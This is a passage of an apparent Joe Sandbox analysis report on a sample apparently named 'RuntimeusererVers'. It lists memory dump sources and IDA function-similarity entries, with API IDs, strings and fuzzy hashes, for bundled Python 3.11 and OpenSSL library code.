                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_numL_sk_pop_free$L_sk_new_reserveL_sk_valueR_put_errorX509_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1042751175-1080266419
                                                                                                                                                                                                                                          • Opcode ID: c8709bc90463c25e43f5416343c086df3d95b911cc0f9f76808430255535cb40
                                                                                                                                                                                                                                          • Instruction ID: 5890de72f7fd460ea4febe475097b546d35284f4494452384c9cf121fa5c4fb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8709bc90463c25e43f5416343c086df3d95b911cc0f9f76808430255535cb40
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC316132608E8682EB24DB61D4507AEA7A5FBC47D4F088635EE8D43796DF3CF9818700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyModule_GetState.PYTHON311(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E226A
                                                                                                                                                                                                                                          • _Py_hashtable_get.PYTHON311(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E227A
                                                                                                                                                                                                                                          • EVP_get_digestbyname.LIBCRYPTO-1_1(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E22BA
                                                                                                                                                                                                                                          • EVP_get_digestbyname.LIBCRYPTO-1_1(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E22D2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: P_get_digestbyname$Module_Py_hashtable_getState
                                                                                                                                                                                                                                          • String ID: unsupported hash type %s
                                                                                                                                                                                                                                          • API String ID: 3106711627-1604032313
                                                                                                                                                                                                                                          • Opcode ID: 67812a4578febaac995a36f8f4713c82c213913e0e18a1f50772f87860905fed
                                                                                                                                                                                                                                          • Instruction ID: 49b13c50867ba5e1e151604f269d3b7f0f35f71e77131b0b672b1dc5f48616fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67812a4578febaac995a36f8f4713c82c213913e0e18a1f50772f87860905fed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24211B26A08E5389EA618B15E444A3D67A0EB89FF0F160735D95D037A4CF7CFCE08308
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_push$L_sk_new_nullL_sk_popR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1161573302-1080266419
                                                                                                                                                                                                                                          • Opcode ID: bda7fbef5f85bf2da651fee9b55fbaaa1bdd381d02e10f8cf18bd424cfbb4574
                                                                                                                                                                                                                                          • Instruction ID: 93de456c0f12605226f900116c0b47ad7f0b60d28f7bc01abd716a3631b03a4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bda7fbef5f85bf2da651fee9b55fbaaa1bdd381d02e10f8cf18bd424cfbb4574
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69216231A09E4A81FE68DB5695405796394BFC4BE4F064235EE4C47B86EF3CF852C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Module_Py_hashtable_destroyState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3151084188-0
                                                                                                                                                                                                                                          • Opcode ID: 6409e92ed6abdf6465d2e0e55c7a8e7b51ce082ec93473e1912f141f62ee75b4
                                                                                                                                                                                                                                          • Instruction ID: 299cd0af8ce962624e912d78f13a6706697ad7245bd8acd5538748c612800876
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6409e92ed6abdf6465d2e0e55c7a8e7b51ce082ec93473e1912f141f62ee75b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E21AC31D09E4395EB6A8F75A85893832A4BF44BB4B198634DA5E06654CF2DB8B4C390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_InitObject_Stringmallocmemcpy
                                                                                                                                                                                                                                          • String ID: return type is a struct/union with a varsize array member$return type is an opaque structure or union
                                                                                                                                                                                                                                          • API String ID: 673089332-262380981
                                                                                                                                                                                                                                          • Opcode ID: 43eee134c76595acf384d43ec9ba90679dcbf6882532fd98ae7103b4df52b26b
                                                                                                                                                                                                                                          • Instruction ID: 4ade1617f8b4bdadae0ea6c1cd1afede7623e19966ea25df4d3f7572ca1a063c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43eee134c76595acf384d43ec9ba90679dcbf6882532fd98ae7103b4df52b26b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A113A72608F41C2EA48DB16E8642A96360FB48BE4F485635EA4D47B55DF3CF4A4C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Err_Parse_SizeWarnX_clear_optionsX_get_optionsX_set_options
                                                                                                                                                                                                                                          • String ID: ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated
                                                                                                                                                                                                                                          • API String ID: 476201610-2795599882
                                                                                                                                                                                                                                          • Opcode ID: fa8df226c90b56b8790b5c6b0439eca4032e4b6a28a4759f5b435ac5dee65df4
                                                                                                                                                                                                                                          • Instruction ID: 9a1e9fd266c32d73477066cf0ea1957af689caf234d5ed06888eb9a47252e600
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa8df226c90b56b8790b5c6b0439eca4032e4b6a28a4759f5b435ac5dee65df4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0116D66B18F0282F7108B26E4901AA63A1FF84BF6F545635DA6E43768DF3CF8858700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocObject_$ClearDict_FreeItemRefsTrackWeak
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2303943592-0
                                                                                                                                                                                                                                          • Opcode ID: 43dea42326b4e47886a0f060091fd51a1d078fb95c59c3c7195671e49b5abe0f
                                                                                                                                                                                                                                          • Instruction ID: 51bf7921bfd6ada51211f492eb600904b21c5c3e29ff3040dc79c5c5bc5b029e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43dea42326b4e47886a0f060091fd51a1d078fb95c59c3c7195671e49b5abe0f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311837AA09E02C1EB599F65DC643B823A4FF58FF8F185A31DA4E06255CF2DB885C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_List_StringThread_allocate_lock
                                                                                                                                                                                                                                          • String ID: can't allocate lock
                                                                                                                                                                                                                                          • API String ID: 214698565-1504453919
                                                                                                                                                                                                                                          • Opcode ID: fcafceefddd0f88e419e95cf8ef09139d22d98c1ab56a74a1cb33c6b488a13f5
                                                                                                                                                                                                                                          • Instruction ID: f869ebc1502219ce98e741da279dbaac793d174ce6e84662c512b6ce131ff875
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcafceefddd0f88e419e95cf8ef09139d22d98c1ab56a74a1cb33c6b488a13f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501D722A09F0282EB545B25E94933863E5FF89BE5F141A35C91F8A350FF3CA0468301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$String$Arg_Number_OccurredParseSizeSsize_tTuple_
                                                                                                                                                                                                                                          • String ID: O!O:new_array_type$negative array length
                                                                                                                                                                                                                                          • API String ID: 3893677698-1806197627
                                                                                                                                                                                                                                          • Opcode ID: 11e7f9e7b72fa86bae7bec591ed3dab2c90f4af94b057c9a536cc56a69255987
                                                                                                                                                                                                                                          • Instruction ID: 80b801acae0711bb1ce2f3f2d06b4954773ca4b94db292eeacb7e3e933a43eeb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e7f9e7b72fa86bae7bec591ed3dab2c90f4af94b057c9a536cc56a69255987
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C301ED65B09E42C1EE089B56EC601F963A1BF84BF4B844336D92E477A4DEADF108C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$DeallocFormatObject_OccurredUnicode_
                                                                                                                                                                                                                                          • String ID: integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 1393314426-3740469958
                                                                                                                                                                                                                                          • Opcode ID: cf162838fc4ba2ed1187c9136e95c0a958736eb88aee85b284b90a6256a163ce
                                                                                                                                                                                                                                          • Instruction ID: 2d444e0b1194a19074c1a55b752b51f5e89ff8ffcdaa8edecd8e5012539620da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf162838fc4ba2ed1187c9136e95c0a958736eb88aee85b284b90a6256a163ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF01D21E09F4281EE0C9B66FC681B923A4AF89FF1B089234DE1E47761EE3DF4448300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSectionfreemallocmemset$EnterLeave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2095983230-0
                                                                                                                                                                                                                                          • Opcode ID: a4d7a0c54c83230a825b8ba6bf5db334ea95b468009bd3a594e195fd93d7da11
                                                                                                                                                                                                                                          • Instruction ID: 26a921d72dd8985f7857ebbc6a3d43c9b94bf278764ee8fbd887b2bdb8a4452b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d7a0c54c83230a825b8ba6bf5db334ea95b468009bd3a594e195fd93d7da11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D15D23A09B8587E769CF35A5403A9B3A4FB99794F049725DB9E43712EF38F1A1C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$st64$uint_fas$uint_lea$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-4294758678
                                                                                                                                                                                                                                          • Opcode ID: 671ec12d00774c2da27684dc5cc77cd040d15826dfcc7fcbeb9c19ea067d99ca
                                                                                                                                                                                                                                          • Instruction ID: 8d6fb5661f5d871f706753fdfdf1e3f1eb6e65aef24b27c2a8d82391d2db0af7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 671ec12d00774c2da27684dc5cc77cd040d15826dfcc7fcbeb9c19ea067d99ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41BBA6A08E4696EB609B15C8642B927A5FB04FF8F448731CE2D432D5DF38F891C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_new_nullL_sk_pushL_sk_value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 542606518-0
                                                                                                                                                                                                                                          • Opcode ID: 45e2f6b10577ecd7920a06ad24a4fc6e3860420013ab6b207b4ccb3cd9d89438
                                                                                                                                                                                                                                          • Instruction ID: abe7a853de929ce565b7440444f8629562e1b437c32dd90e6baba20f3f0226dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e2f6b10577ecd7920a06ad24a4fc6e3860420013ab6b207b4ccb3cd9d89438
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5321B121F0EE5681FE74AA5258046799794FFC4FE0F080239EE4D57B86DE2CF9424310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_Py_hashtable_set$FreeMallocPy_hashtable_destroyPy_hashtable_new_full
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3987031744-0
                                                                                                                                                                                                                                          • Opcode ID: 4d3727f9dcbb20985ec9bf9f97716139e44a5e8b477380798206113630c02f70
                                                                                                                                                                                                                                          • Instruction ID: 67e327f93b460871aca01bc71cde2fe439f1852f7c8dd218cb2672a445fefac7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d3727f9dcbb20985ec9bf9f97716139e44a5e8b477380798206113630c02f70
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E21F525A18E4782EA118B25E804BB963A0FF94BE8F049731DA4D026A4EF6CF5E5C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$AllocDict_FreeFromGenericLibraryStringType_Unicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3239884862-0
                                                                                                                                                                                                                                          • Opcode ID: cb6b992dccc0bbbd35eec4e552fa07fff812e8ade9aaf94e67c5b67c9c866cbb
                                                                                                                                                                                                                                          • Instruction ID: f81f4f469bf5e5acd6d99a8fd142c86fcb6ec9225c06be949a76e70cc0105117
